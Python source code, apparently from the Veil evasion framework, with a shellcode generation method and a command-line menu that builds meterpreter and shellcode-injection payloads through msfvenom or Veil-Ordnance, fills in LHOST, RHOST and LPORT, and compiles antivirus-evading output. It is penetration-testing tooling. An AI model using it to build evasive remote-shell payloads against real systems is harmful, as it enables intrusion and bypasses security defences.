def generate(self, required_options=None):
"""
Based on the options set by menu() or SetPayload()
either returns the custom shellcode string or calls msfvenom
and returns the result.
Returns the shellcode string for this object.
"""
self.required_options = required_options
# if the msfvenom command nor shellcode are set, revert to the
# interactive menu to set any options
if self.msfvenomCommand == '' and self.custom_shellcode == '':
self.menu()
# return custom specified shellcode if it was set previously
if self.custom_shellcode != '':
print(helpers.color("\n [*] Using pre-generated shellcode..."))
return self.custom_shellcode
elif self.invoke_ordnance:
print(
helpers.color(
"\n [*] Generating shellcode using Veil-Ordnance..."))
ordnance_loop = True
Ordnance_object = ordnance_import.Tools()
while ordnance_loop:
Ordnance_object.tool_main_menu(invoked=True)
if Ordnance_object.final_shellcode != '':
self.payload_choice = Ordnance_object.selected_payload
self.shellcode_options = Ordnance_object.payload_options
ordnance_loop = False
return Ordnance_object.final_shellcode
# generate the shellcode using msfvenom
else:
print(
helpers.color("\n [*] Generating shellcode using msfvenom..."))
if self.msfvenomCommand == '':
print(
helpers.color(
" [!] ERROR: msfvenom command not specified in payload!\n",
warning=True))
return None
else:
# Strip out extra characters, new lines, etc., just leave the shellcode.
# Tim Medin's patch for non-root non-Kali users
msfvenom_shellcode = subprocess.check_output(
settings.MSFVENOM_PATH + self.msfvenomCommand, shell=True)
self.shellcode_options = self.msfvenomCommand
msfvenom_shellcode = msfvenom_shellcode.decode('ascii')
self.msfvenomCommand = ""
return msfvenom_shellcode[22:-1].strip()
def cli_menu(self, invoked=False):
# --list-payloads
if self.command_options.list_payloads:
self.list_loaded_payloads()
sys.exit()
# Check if a payload is provided, and if so, start the generation
# process
# Missing -p ?
if not self.command_options.p:
print(helpers.color(" [!] ERROR: Missing --payload selection (-p <payload>). Try: -t Evasion --list-payloads", warning=True))
else:
user_cli_payload = self.return_payload_object(self.command_options.p)
if not user_cli_payload:
print(helpers.color(" [!] ERROR: You did not provide a valid payload selection!", warning=True))
print(helpers.color(" [*] Ex: info 2 OR info lua/shellcode_inject/flat.py", warning=True))
sys.exit()
if self.command_options.ip is None and ("meterpreter" in user_cli_payload.path or "shellcode_inject" in user_cli_payload.path):
print(helpers.color(" [!] ERROR: You did not provide an IP/domain to connect to/bind on", warning=True))
sys.exit()
# Make sure IP is valid
# --ip
if self.command_options.ip is not None:
valid_ip = helpers.validate_ip(self.command_options.ip)
valid_hostname = helpers.validate_hostname(self.command_options.ip)
if not valid_ip and not valid_hostname:
print(helpers.color(" [!] ERROR: You did not provide a valid ip/domain!", warning=True))
print(helpers.color("[*] Please specify the correct value", warning=True))
sys.exit()
# Determine if using Ordnance or MSFVenom for shellcode generation
if self.command_options.ordnance_payload is None and self.command_options.msfvenom is None and "meterpreter" not in user_cli_payload.path:
print(helpers.color(" [!] ERROR: You did not provide a shellcode option to use!", warning=True))
sys.exit()
# Check if using a pure payload (shellcodeless)
if "meterpreter" in user_cli_payload.path or "shellcode_inject" in user_cli_payload.path:
if "meterpreter" in user_cli_payload.path:
# Check for where the IP is being stored
if "LHOST" in user_cli_payload.required_options:
user_cli_payload.required_options["LHOST"][0] = self.command_options.ip
elif "RHOST" in user_cli_payload.required_options:
user_cli_payload.required_options["RHOST"][0] = self.command_options.ip
# Store the LPORT value in the payload
if "LPORT" in user_cli_payload.required_options:
user_cli_payload.required_options["LPORT"][0] = self.command_options.port
else:
# If ordnance, generate shellcode through it
if self.command_options.ordnance_payload is not None:
Ordnance_object = ordnance_import.Tools(self.command_options)
Ordnance_object.cli_menu(invoked=True)
cli_shellcode = Ordnance_object.final_shellcode
# Or if msfvenom, get that code
elif self.command_options.msfvenom is not None:
cli_shellcode = shellcode_help.cli_msf_shellcode_gen(self.command_options)
# This could be the future area for adding custom shellcode. If there
# is a need I can add it in
# Set the shellcode in the Evasion payload
user_cli_payload.cli_shellcode = cli_shellcode
# Loop over setting required options
# -c
if self.command_options.c is not None:
for payload_option in self.command_options.c:
if payload_option != '':
if "=" not in payload_option:
print(helpers.color(" [!] Payload option not entered in correct syntax.\n", warning=True))
sys.exit()
else:
key = payload_option.split('=')[0].upper()
value = payload_option.split('=')[1]
if key in user_cli_payload.required_options:
user_cli_payload.required_options[key][0] = value
else:
print(helpers.color(" [!] The option " + key + " does not exist for the selected payload!.\n", warning=True))
sys.exit()
# Generate the payload code
# source code stored in user_cli_payload.source_code
user_cli_payload.generate()
# figure out how to compile the code
outfile.compiler(user_cli_payload, invoked=True, cli_object=self.command_options)
return
